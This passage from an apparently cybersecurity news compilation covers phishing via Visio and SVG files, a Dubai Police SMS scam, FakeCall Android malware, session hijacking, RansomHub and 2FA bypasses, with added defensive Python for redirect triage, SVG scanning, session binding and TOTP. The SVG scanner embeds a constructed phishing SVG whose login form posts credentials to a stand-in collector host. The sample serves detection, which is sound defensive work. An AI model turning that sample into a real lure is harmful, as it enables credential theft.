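        segment = parsed.path.split("/")[3]
        redirect_host, via = (segment.lower() or None), "amp-cache-path"
    else:
        for key, value in parse_qsl(parsed.query, keep_blank_values=True):
            host = _absolute_host(value)
            if host and host != outer_host:
                redirect_host, via = host, f"param:{key}"
                break

    final_host = redirect_host or outer_host
    tld = final_host.rsplit(".", 1)[-1] if "." in final_host else ""
    return {
        "outer_host": outer_host,
        "redirect_host": redirect_host,
        "via": via,
        "open_redirect": redirect_host is not None,
        "suspicious_tld": tld in SUSPICIOUS_TLDS,
    }


def triage(urls):
    """Return only the URLs that show either indicator, with their analysis."""
    results = [(u, analyze_url(u)) for u in urls]
    return [(u, r) for u, r in results if r["open_redirect"] or r["suspicious_tld"]]


if __name__ == "__main__":
    constructed = [
        "https://portal.example.com/login?next=/dashboard",
        "https://trusted.example.com/out?url=https%3A%2F%2Fsecure-docs.example.su%2Fview",
        "https://www.google.com/amp/s/login.example.ru/verify",
        "https://trusted.example.com/out?url=//cdn.example.ru/x",
    ]
    for url, result in triage(constructed):
        print(url, "->", result)
```

Relative values such as `next=/dashboard` are ignored on purpose: a same-site redirect is normal application behaviour, and flagging it would bury the cross-site cases the report is about.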

Cybercriminals Exploit Two-Step Phishing Tactics and SVG Attachments in Sophisticated Cyber Attacks

Layered defense strategies are a cornerstone of cybersecurity, but attackers are employing similar methods to launch sophisticated attacks. Two-step phishing (2SP) tactics are becoming increasingly prevalent, leveraging trusted platforms to deliver malicious content in layers and evade detection, according to researchers at Perception Point.

These researchers have identified a new wave of 2SP attacks weaponising Microsoft Visio (.vsdx) files. Peleg Cabra, product marketing manager at Perception Point, shared that Ariel Davidpur, a security researcher at the firm, uncovered an alarming trend: attackers are embedding malicious URLs within Visio files to bypass security systems.

Visio, widely used in workplaces for data visualization, plays into the attackers' strategy of exploiting familiarity. The files are being used in phishing emails containing urgent business-related requests. Once the recipient engages with these emails and accesses the Visio file, they encounter another embedded URL disguised as a clickable button, like “view document.”

Perception Point’s analysis highlights how attackers ask victims to hold the Ctrl key while clicking the URL, bypassing automated detection tools. This redirects users to a fake Microsoft 365 login page designed to steal credentials. Robust two-factor authentication is recommended to mitigate the risks of such attacks.

Additionally, a report by Lawrence Abrams from Bleeping Computer reveals another alarming technique: attackers are leveraging scalable vector graphics (SVG) files. These files, capable of displaying HTML and executing JavaScript, are being used to deliver phishing forms and malware. Security researcher MalwareHunterTeam demonstrated how SVG attachments could mimic an Excel spreadsheet with an embedded login form to harvest credentials.

To counter these threats, cybersecurity experts recommend treating SVG attachments with suspicion and implementing stringent email security measures.
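"Treating SVG attachments with suspicion" can be made concrete: an SVG that is really an image contains shapes, paths and text, while one used as a phishing vehicle carries `<script>`, `<foreignObject>` with an HTML form, event-handler attributes or `javascript:` links. The following scanner is an added example, not code from Perception Point or MalwareHunterTeam; the two sample SVGs are constructed, the collector host uses the reserved `.invalid` TLD, and the check is a triage heuristic rather than a full parser of every SVG feature:

```python
"""Scan an SVG attachment for document-like (active) content.

Added example; the SVGs below are constructed.  For untrusted input in
production, parse with the defusedxml package instead of xml.etree to avoid
entity-expansion attacks on the parser itself.
"""
import xml.etree.ElementTree as ET

# Elements that make an SVG behave like a web page rather than a picture.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed", "form", "input"}

SAMPLE_MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="400" height="300">
  <rect width="400" height="300" fill="#fff"/>
  <text x="20" y="40">Quarterly_Report.xlsx</text>
  <foreignObject width="400" height="250">
    <form xmlns="http://www.w3.org/1999/xhtml"
          action="https://collector.example.invalid/submit" method="post">
      <input name="email"/><input name="password" type="password"/>
    </form>
  </foreignObject>
  <script>window.location = "https://collector.example.invalid/next";</script>
  <a xlink:href="javascript:void(0)"><text x="20" y="280">Open</text></a>
</svg>"""

SAMPLE_BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""


def _local(name):
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(svg_text):
    """Return a list of findings; an empty list means the file looks like a plain image."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name, val = _local(attr), value.strip().lower()
            if name.startswith("on"):                       # onload, onclick, onmouseover, ...
                findings.append(f"event handler attribute {name}")
            elif name in ("href", "action") and val.startswith(("javascript:", "data:")):
                findings.append(f"{name} uses {val.split(':', 1)[0]}: scheme")
            elif name in ("href", "action") and val.startswith(("http://", "https://")):
                findings.append(f"external {name} target")
    return findings


if __name__ == "__main__":
    print("malicious sample:", scan_svg(SAMPLE_MALICIOUS_SVG))
    print("benign sample:", scan_svg(SAMPLE_BENIGN_SVG) or "no findings")
```

A gateway policy built on this can quarantine any SVG with findings and let the rest through, which keeps legitimate diagrams and logos flowing while stopping the spreadsheet-lookalike login form the post describes.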

International Fraud Awareness Week, held from November 17 to 23, 2024, aims to raise awareness of evolving cyber fraud. Muhammad Yahya Patel, lead security engineer at Check Point Software, warns that technological advancements empower both legitimate industries and cyber criminals.

Patel categorizes the major fraud types businesses should watch out for:
  • Cyber Fraud: Using phishing, malware, and ransomware to steal sensitive data.
  • Internal Fraud: Involving employee-driven actions like embezzlement and theft.
  • Invoice Fraud: Sending fake invoices to businesses for payment.
  • CEO Fraud: Impersonating executives to extract sensitive information.
  • Return Fraud: Exploiting return policies in retail for financial gain.
  • Payroll Fraud: Manipulating payroll systems to benefit employees fraudulently.
Ransomware has also evolved from untargeted attacks to highly strategic campaigns, employing reconnaissance and double-extortion tactics. As cyber threats grow more sophisticated, businesses must remain vigilant, adopt robust security practices, and foster awareness to combat evolving fraud.

Dubai Police Impersonation Scam: A Sophisticated Cybercrime Targeting UAE Residents

Cybercriminals have recently targeted the Dubai Police in an elaborate impersonation scam aimed at defrauding unsuspecting individuals in the UAE. Thousands of phishing text messages, pretending to be from law enforcement, were sent to trick recipients into clicking on malicious links. These links redirected victims to fake websites designed to steal sensitive information, including bank details and personal identification.

According to researchers at BforeAI, these campaigns employ official branding to appear legitimate, showcasing a calculated level of sophistication. While specifically targeting UAE residents, the campaign adopts a broad “spray-and-pray” phishing approach. It leverages fear and trust in law enforcement — a psychological factor especially potent in a country like the UAE, where respect for authority is deeply ingrained.

Abu Qureshi, a threat intelligence expert at BforeAI, emphasized how cybercriminals misuse Dubai Police branding to deceive victims. This tactic highlights an advanced understanding of social engineering, combining fear and the appearance of credibility. UAE citizens with limited awareness of digital threats are particularly susceptible to such scams, mistaking fraudulent communication for genuine correspondence.

The Rising Threat of Cybercrime in the UAE

The increase in cybercrime campaigns across the UAE and the Middle East mirrors global trends in cybercriminal activity. A report by Kaspersky revealed that 87% of UAE-based companies have encountered cyber incidents in the past two years. Several factors contribute to the UAE being an attractive target for cybercriminals:

  • Affluent population and wealth concentration.
  • Widespread internet access and rapid adoption of digital technologies.
  • Exploitation of vulnerabilities in newly implemented systems.

Financially motivated campaigns often focus on wealthy regions or individuals, while geopolitical dynamics and economic factors play a role in the increasing cyber threats in the region.

Advanced Techniques Used in the Dubai Police Scam

In the Dubai Police impersonation scam, attackers used automated domain generation algorithms (DGA) and bulk domain registration techniques to host malicious web pages. These domains, typically short-lived, make detection challenging. Investigations by BforeAI traced many of these domains to Tencent servers in Singapore.

Although Singapore is known for its strong cybersecurity measures, its status as a global tech hub makes it a prime location for cybercriminals to exploit legitimate platforms. Tencent, a China-based firm with a significant presence in Singapore, has faced scrutiny for its servers being previously linked to malicious activity.

Mitigating the Risks of Sophisticated Cyber Scams

To combat threats like the Dubai Police impersonation scam, organizations and individuals must adopt proactive cybersecurity measures:

  • Predictive phishing detection to identify threats early.
  • Employee training programs to enhance awareness.
  • Collaboration with local law enforcement and Computer Emergency Response Teams (CERTs).

Enhancing vigilance and implementing robust incident response plans can significantly mitigate risks. Additionally, cross-border cooperation and threat intelligence sharing are essential to address the globalized nature of cybercrime effectively.

New SMTP Cracking Tool for 2024 Sold on Dark Web Sparks Email Security Alarm

A new method targeting SMTP (Simple Mail Transfer Protocol) servers, specifically updated for 2024, has surfaced for sale on the dark web, sparking significant concerns about email security and data privacy.

This cracking technique is engineered to bypass protective measures, enabling unauthorized access to email servers. Such breaches risk compromising personal, business, and government communications.

The availability of this tool showcases the growing sophistication of cybercriminals and their ability to exploit weaknesses in email defenses. Unauthorized access to SMTP servers not only exposes private correspondence but also facilitates phishing, spam campaigns, and cyber-espionage.

Experts caution that widespread use of this method could result in increased phishing attacks, credential theft, and malware distribution. "Organizations and individuals must prioritize strengthening email security protocols, implementing strong authentication, and closely monitoring for unusual server activity," they advise.

Mitigating these risks requires consistent updates to security patches, enforcing multi-factor authentication, and using email encryption. The emergence of this dark web listing highlights the ongoing threats cybercriminals pose to critical communication systems.

As attackers continue to innovate, the cybersecurity community emphasizes vigilance and proactive defense strategies to safeguard sensitive information. This development underscores the urgent need for robust email security measures in the face of evolving cyber threats.

FakeCall Malware for Android Escalates Threat, Hijacks Outgoing Bank Calls

A newly evolved version of the FakeCall malware, a dangerous Android banking trojan, has been discovered hijacking users’ outgoing calls to their financial institutions, redirecting them to phone numbers controlled by attackers. The malware, first identified by Kaspersky in April 2022, focuses on voice phishing (vishing) scams, tricking victims into revealing sensitive banking information. 

The trojan presents a fake call interface that closely mimics Android’s default dialer, convincing victims they are communicating with legitimate bank representatives. 

This makes it challenging for users to discern the deception. When attempting to call their bank, the malware secretly redirects the call to attackers, who impersonate bank officials to steal personal information and money from accounts. A new report from Zimperium reveals that the latest FakeCall variant further enhances its capabilities. 

By tricking users into setting it as the default call handler during installation, the malware gains the ability to intercept both incoming and outgoing calls. In addition, the malware manipulates the Android user interface to show the bank’s actual phone number while connecting the victim to a scammer, deepening the illusion of legitimacy. The updated malware also adds new, though still developing, functionalities. 

It now uses Android’s Accessibility Service to simulate user actions, control the dialer interface, and automatically grant itself permissions. FakeCall’s operators have also introduced a Bluetooth listener and a screen state monitor, indicating ongoing development toward more advanced attack methods. Additional commands integrated into the latest version include capturing live screen content, taking screenshots, and accessing or deleting device images. 

These upgrades demonstrate the malware’s evolving sophistication, as it becomes harder to detect and remove. Security experts recommend avoiding the manual installation of Android apps through APKs, encouraging users to rely on the Google Play Store for app downloads. Though malware can still infiltrate Google Play, the platform’s security measures, such as Google Play Protect, can help identify and remove malicious apps when detected.

Session Hijacking Surges: Attackers Exploit MFA Gaps with Modern Tactics

As multi-factor authentication (MFA) becomes more common, attackers are increasingly resorting to session hijacking. Evidence from 2023 shows this trend: Microsoft detected 147,000 token replay attacks, marking a 111% increase year-over-year. Google reports that attacks on session cookies now rival traditional password-based threats.

Session hijacking has evolved from old Man-in-the-Middle (MitM) attacks, which relied on intercepting unsecured network traffic. Today, these attacks are internet-based, focusing on cloud apps and services. Modern session hijacking involves stealing session materials like cookies and tokens, enabling attackers to bypass standard security controls like VPNs, encrypted traffic, and even MFA.

The rise of identity-based attacks is a result of the growing complexity of user accounts, with each person managing multiple cloud-based services. Once attackers gain access to an active session, they can bypass MFA, leveraging the valid session tokens, which often stay active longer than expected.

Modern phishing toolkits, such as adversary-in-the-middle (AitM) and browser-in-the-middle (BitM) kits, make hijacking easier by letting attackers intercept the MFA exchange or trick users into working inside a browser the attacker controls. Infostealers, a newer class of tool, capture session cookies from the victim's browser, putting multiple applications at risk, especially when EDR systems fail to detect them.

Infostealer infections are often traced back to unmanaged personal devices, which sync browser profiles with work devices, leading to the compromise of corporate credentials. EDRs aren’t always reliable in stopping these threats, and attackers can still resume stolen sessions without re-authentication, making it difficult for organizations to detect unauthorized access.

Passkeys offer some protection by preventing phishing, but infostealers bypass authentication entirely. While app-level controls exist to detect unauthorized sessions, many are inadequate. Companies are now considering browser-based solutions that monitor user agent strings for signs of session hijacking, offering a last line of defense against these sophisticated attacks.
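The "app-level controls" and user-agent monitoring mentioned above amount to binding a session to the context it was issued in and keeping its lifetime short, so a stolen cookie is worth less when replayed elsewhere. The following server-side session store is an added example, not code from Microsoft, Google or any product named on this page; the lifetimes, the /24 and /64 network granularity, the user agents and IP addresses are constructed assumptions:

```python
"""Session binding and lifetime checks against cookie replay.

Added example.  Policy values, user agents and addresses are constructed.
Verdicts: 'ok', 'unknown-session', 'expired', 'user-agent-mismatch',
'network-change' (the last means step-up authentication, not a block).
"""
from datetime import datetime, timedelta
import ipaddress
import secrets

ABSOLUTE_TTL = timedelta(hours=8)     # assumed policy: re-login at least once a shift
IDLE_TTL = timedelta(minutes=30)      # assumed policy: idle sessions die quickly


def _network(ip):
    """Coarse network identity (/24 for IPv4, /64 for IPv6) so NAT churn does not trip the check."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 64
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def issue(self, user, user_agent, ip, now):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "ua": user_agent, "net": _network(ip),
                               "issued": now, "last_seen": now}
        return sid

    def check(self, sid, user_agent, ip, now):
        s = self._sessions.get(sid)
        if s is None:
            return "unknown-session"
        if now - s["issued"] > ABSOLUTE_TTL or now - s["last_seen"] > IDLE_TTL:
            del self._sessions[sid]
            return "expired"
        if user_agent != s["ua"]:
            del self._sessions[sid]           # revoke: the same cookie is in use from another browser
            return "user-agent-mismatch"
        if _network(ip) != s["net"]:
            return "network-change"           # plausible roaming: demand re-authentication instead
        s["last_seen"] = now
        return "ok"


def replay_scenario():
    """Constructed sequence: legitimate use, then the cookie replayed from a different browser."""
    store = SessionStore()
    t0 = datetime(2024, 10, 1, 9, 0)
    victim_ua = "Mozilla/5.0 (Windows NT 10.0) Chrome/129.0"
    sid = store.issue("alice", victim_ua, "203.0.113.10", t0)
    return [
        store.check(sid, victim_ua, "203.0.113.10", t0 + timedelta(minutes=5)),
        store.check(sid, "Mozilla/5.0 (X11; Linux) Firefox/130.0", "198.51.100.7", t0 + timedelta(minutes=10)),
        store.check(sid, victim_ua, "203.0.113.10", t0 + timedelta(minutes=11)),   # victim is now logged out too
    ]


def roaming_scenario():
    """Constructed sequence: same browser moving between networks, then going idle."""
    store = SessionStore()
    t0 = datetime(2024, 10, 1, 9, 0)
    ua = "Mozilla/5.0 (Windows NT 10.0) Chrome/129.0"
    sid = store.issue("bob", ua, "203.0.113.10", t0)
    return [
        store.check(sid, ua, "203.0.113.200", t0 + timedelta(minutes=1)),   # same /24: fine
        store.check(sid, ua, "198.51.100.7", t0 + timedelta(minutes=2)),    # new network: step-up
        store.check(sid, ua, "203.0.113.10", t0 + timedelta(minutes=40)),   # idle too long: expired
    ]


if __name__ == "__main__":
    print("replay:", replay_scenario())
    print("roaming:", roaming_scenario())
```

An infostealer that copies the cookie and the victim's user-agent string would pass the second check, which is why the lifetime limits are there as well: the window in which a replayed session is usable should be minutes, not the days that long-lived tokens allow.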

Hackers Use Auto-reply to Deliver Crypto-miner Via Malicious Emails

Threat actors use new techniques to distribute malware, which is evolving constantly. In a recent attack, they used malicious e-mail auto-replies to deliver crypto-mining malware. Russian cybersecurity firm F.A.C.C.T. said that threat actors breached e-mail accounts and set up automatic replies containing links to cryptocurrency mining malware.

Auto-replies for Malware Distribution

In traditional malware distribution attacks, hackers used malicious downloads, compromised websites, and phishing emails. The new method uses auto-replies instead. Experts from F.A.C.C.T explained that the technique was employed to deliver the Xmrig crypto-miner to workers at Russian tech companies, insurance firms, financial businesses, and retail marketplaces. Experts found 150 emails containing Xmrig earlier this year. 

Cybercriminals Using New Methods

Dmitry Eremenko, senior analyst at F.A.C.C.T said “This method of malware delivery is dangerous because the potential victim initiates communication first. This is the main difference from traditional mass mailings, where the recipient often receives an irrelevant email and ignores it.” 

Although the auto-reply emails did not look especially convincing, they did not raise suspicion. To avoid detection, the attackers attached a scan of a real invoice for an equipment payment, unrelated to the subject of the original message. This means that both companies and individual users who correspond with the breached mailbox can become targets. 

Use of cryptocurrency mining software

Xmrig is an open-source cryptocurrency mining software mainly used for mining Monero (XMR). Cybercriminals have been using new techniques to deliver Xmrig to target devices. For instance, in one campaign, the hackers used a pirated version of Final Cut Pro (a video editing software) to deploy the crypto-miner on Apple computers.

F.A.C.C.T has no information about who is behind the attack or how successful it was. Experts believe the breached email accounts had previously had their credentials leaked on the darknet. The breached accounts belonged to construction companies, a furniture factory, a farm, and small trading firms. 

To stay safe, the report suggests: “do not save passwords in browsers or install unlicensed software, because it may contain stealers, do not follow dubious links in the mail and do not enter your data on dubious sites (phishing).”

RansomHub Ransomware: Exploiting Trusted Tools to Evade Detection

Ransomware groups continue to innovate and adapt their tactics to bypass security measures. One such group, RansomHub, reported by Malwarebytes, has recently garnered attention for its sophisticated approach to disabling Endpoint Detection and Response (EDR) systems. By leveraging Kaspersky’s TDSSKiller, a legitimate rootkit removal tool, RansomHub has managed to execute its malicious payloads undetected, posing a significant threat to organizations worldwide.

The Rise of RansomHub

RansomHub is a relatively new player in the ransomware scene, but it has quickly made a name for itself with its advanced techniques and targeted attacks. Unlike traditional ransomware groups that rely on brute force methods or simple phishing campaigns, RansomHub employs a more nuanced strategy. By using legitimate software tools in unexpected ways, they can evade detection and maximize the impact of their attacks.

The Role of Kaspersky’s TDSSKiller

Kaspersky’s TDSSKiller is a well-known tool in the cybersecurity community, designed to detect and remove rootkits from infected systems. Rootkits are a type of malware that can hide the presence of other malicious software, making them particularly dangerous. TDSSKiller is widely trusted and used by security professionals to clean compromised systems.

However, RansomHub has found a way to exploit this tool for malicious purposes. By incorporating TDSSKiller into their attack chain, they can disable EDR software that would otherwise detect and block their ransomware. This tactic is particularly insidious because it uses a trusted tool to carry out malicious actions, making it harder for security teams to identify and respond to the threat.

The Attack Chain

RansomHub’s attack chain typically begins with a phishing email or a compromised website that delivers the initial payload. Once the ransomware is on the target system, it uses a variety of techniques to escalate privileges and gain control over the machine. This is where TDSSKiller comes into play.

By running TDSSKiller, the ransomware can disable EDR software and other security measures that would normally detect and block the attack. With these defenses out of the way, RansomHub can then proceed to encrypt the victim’s files and demand a ransom for their release. In some cases, they also use a credential-harvesting tool called LaZagne to extract sensitive information, further increasing the pressure on the victim to pay the ransom.

Threats Posed by Tools

The use of legitimate tools like TDSSKiller in ransomware attacks highlights a significant challenge for the cybersecurity community. Traditional security measures are often designed to detect and block known malware and suspicious behavior. However, when attackers use trusted tools unexpectedly, these measures can be less effective.

This tactic also underscores the importance of a multi-layered approach to cybersecurity. Relying solely on EDR software or other endpoint protection measures is no longer sufficient. Organizations must implement a comprehensive security strategy that includes network monitoring, threat intelligence, and user education to detect and respond to these advanced threats.

How to Protect Your Accounts from 2FA Vulnerabilities: Avoid Common Security Pitfalls

Securing an account with only a username and password is insufficient because these can be easily stolen, guessed, or cracked. Therefore, two-factor authentication (2FA) is recommended for securing important accounts and has been a mandatory requirement for online banking for years.

2FA requires two distinct factors to access an account, network, or application, which can be from the following categories:
  • Knowledge: Something you know, like a password or PIN.
  • Possession: Something you have, such as a smartphone or a security token like a FIDO2 stick.
  • Biometrics: Something you are, including fingerprints or facial recognition.
For effective security, the two factors used in 2FA should come from different categories. If more than two factors are involved, it's referred to as multi-factor authentication. While 2FA significantly enhances security, it isn't completely foolproof. Cybercriminals have developed methods to exploit vulnerabilities in 2FA systems.

1. Man-in-the-Middle Attacks: Phishing for 2FA Codes
Despite the secure connection provided by Transport Layer Security (TLS), attackers can use various techniques to intercept the communication between the user and their account, known as "man-in-the-middle" attacks. A common approach involves phishing pages, where attackers create fake websites that resemble legitimate services to trick users into revealing their login credentials. These phishing sites can capture not only usernames and passwords but also the 2FA codes, allowing attackers to access accounts in real time. This type of attack is highly time-sensitive, as the one-time passwords used in 2FA typically expire quickly. Despite the complexity, criminals often use this method to steal money directly.

2. Man-in-the-Browser Attacks: Malware as a Middleman
A variation of man-in-the-middle attacks involves malware that integrates itself into the victim’s web browser. This malicious code waits for the user to log in to services like online banking and then manipulates transactions in the background. Although the user sees the correct transfer details in their browser, the malware has altered the transaction to divert funds elsewhere. Notable examples of such malware include Carberp, Emotet, SpyEye, and Zeus.

Prevention Tip: When authorizing transactions, always verify the transfer details, such as the amount and the recipient's IBAN, which are typically sent by banks during the 2FA process.
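Sections 1 and 2 above describe two different weaknesses: a one-time code can be relayed by a phishing page for as long as its time step is valid, and a code that is not tied to the transaction can authorize whatever a man-in-the-browser actually submitted. The following added example (not from the article's author or any bank's implementation) implements RFC 4226 HOTP and RFC 6238 TOTP, shows the relay window, and then shows a transaction-bound code in which the amount and IBAN are mixed into the key so a swapped IBAN fails verification. The shared secret is the RFC test vector; the IBANs and amount are constructed placeholders:

```python
"""TOTP relay window versus a transaction-bound code.

Added example.  The secret is the RFC 4226/6238 test secret; IBANs, amount
and timestamps are constructed.  Transaction binding here is a simple
HMAC-derived key, not any specific bank's chipTAN/photoTAN scheme.
"""
import hashlib
import hmac
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{binary % (10 ** digits):0{digits}d}"


def totp(secret: bytes, unix_time: int, step: int = 30) -> str:
    """RFC 6238: HOTP with the counter taken from the current 30-second step."""
    return hotp(secret, unix_time // step)


def verify_totp(secret, code, unix_time, step=30, drift=1):
    """Accept the current step plus/minus `drift` steps to tolerate clock skew."""
    counter = unix_time // step
    return any(hmac.compare_digest(code, hotp(secret, counter + d)) for d in range(-drift, drift + 1))


def _transaction_key(secret, amount, iban):
    """Derive a per-transaction key so the code only verifies for these exact details."""
    return hmac.new(secret, f"{amount}|{iban}".encode(), hashlib.sha256).digest()


def transaction_code(secret, amount, iban, unix_time, step=30):
    """Code over the transfer details the customer actually sees (what you see is what you sign)."""
    return hotp(_transaction_key(secret, amount, iban), unix_time // step)


def verify_transaction_code(secret, amount, iban, code, unix_time, step=30, drift=1):
    key = _transaction_key(secret, amount, iban)
    counter = unix_time // step
    return any(hmac.compare_digest(code, hotp(key, counter + d)) for d in range(-drift, drift + 1))


def relay_scenario(secret=b"12345678901234567890", t=1_000_000):
    """A phished TOTP code works for the attacker 20 s later, but not 120 s later."""
    code = totp(secret, t)
    return verify_totp(secret, code, t + 20), verify_totp(secret, code, t + 120)


def mitb_scenario(secret=b"12345678901234567890", t=1_000_000):
    """Customer approves 100.00 to the IBAN shown; malware submits a different IBAN."""
    iban_shown = "DE00000000000000000000"        # constructed placeholder
    iban_submitted = "DE99999999999999999999"    # constructed placeholder
    code = transaction_code(secret, "100.00", iban_shown, t)   # computed on the customer's device
    accepted_legit = verify_transaction_code(secret, "100.00", iban_shown, code, t + 5)
    accepted_tampered = verify_transaction_code(secret, "100.00", iban_submitted, code, t + 5)
    return accepted_legit, accepted_tampered


if __name__ == "__main__":
    print("relay (20 s, 120 s):", relay_scenario())
    print("man-in-the-browser (legit, tampered):", mitb_scenario())
```

The relay result is why section 1 calls the attack time-sensitive: the phishing kit has to forward the code within the current step and its drift allowance. The transaction result is the mechanism behind the prevention tip: when the bank's confirmation message carries the amount and recipient IBAN, the customer is effectively checking the inputs to this binding, and a code produced for the displayed details cannot be reused for the altered ones.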

3. Social Engineering: Tricking Users Out of Their 2FA Codes
Attackers may already have access to usernames and passwords, possibly obtained from data breaches or through malware on the victim's device. To gain the second factor needed for access, they may resort to direct contact. For instance, they may pose as bank employees, claiming to need 2FA codes to implement a new security feature. If the victim complies, they unknowingly authorize a fraudulent transaction.

Prevention Tip: Never share your 2FA codes or authorizations with anyone, even if they claim to be from your bank or another trusted service. Legitimate service representatives will never ask for such confidential information.

Understanding these threats and remaining vigilant can significantly reduce the risks associated with 2FA vulnerabilities.